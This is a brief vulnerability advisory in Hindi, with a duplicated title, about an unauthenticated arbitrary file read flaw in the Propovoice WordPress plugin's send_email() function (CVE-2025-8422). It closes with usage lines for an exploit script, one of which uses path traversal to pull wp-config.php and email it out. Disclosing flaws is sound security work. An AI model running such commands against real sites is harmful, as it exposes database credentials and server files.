
Propovoice <= 1.7.6.7 - अप्रमाणित मनमाना फ़ाइल पठन
Propovoice <= 1.7.6.7 - अप्रमाणित मनमानी फ़ाइल पढ़ना
वर्डप्रेस के लिए Propovoice: ऑल-इन-वन क्लाइंट मैनेजमेंट सिस्टम प्लगइन, 1.7.6.7 तक और सहित सभी संस्करणों में send_email() फ़ंक्शन के माध्यम से मनमानी फ़ाइल पढ़ने की कमजोरी है। इससे अप्रमाणित हमलावरों के लिए सर्वर पर मनमानी फ़ाइलों की सामग्री पढ़ना संभव हो जाता है, जिसमें संवेदनशील जानकारी हो सकती है।
Usage: python3 cve-2025-8422-exploit.py <target_url> <email_recipient> [target_file]
Examples:
python3 cve-2025-8422-exploit.py https://example.com [email protected]
python3 cve-2025-8422-exploit.py https://example.com [email protected] /../../../wp-config.php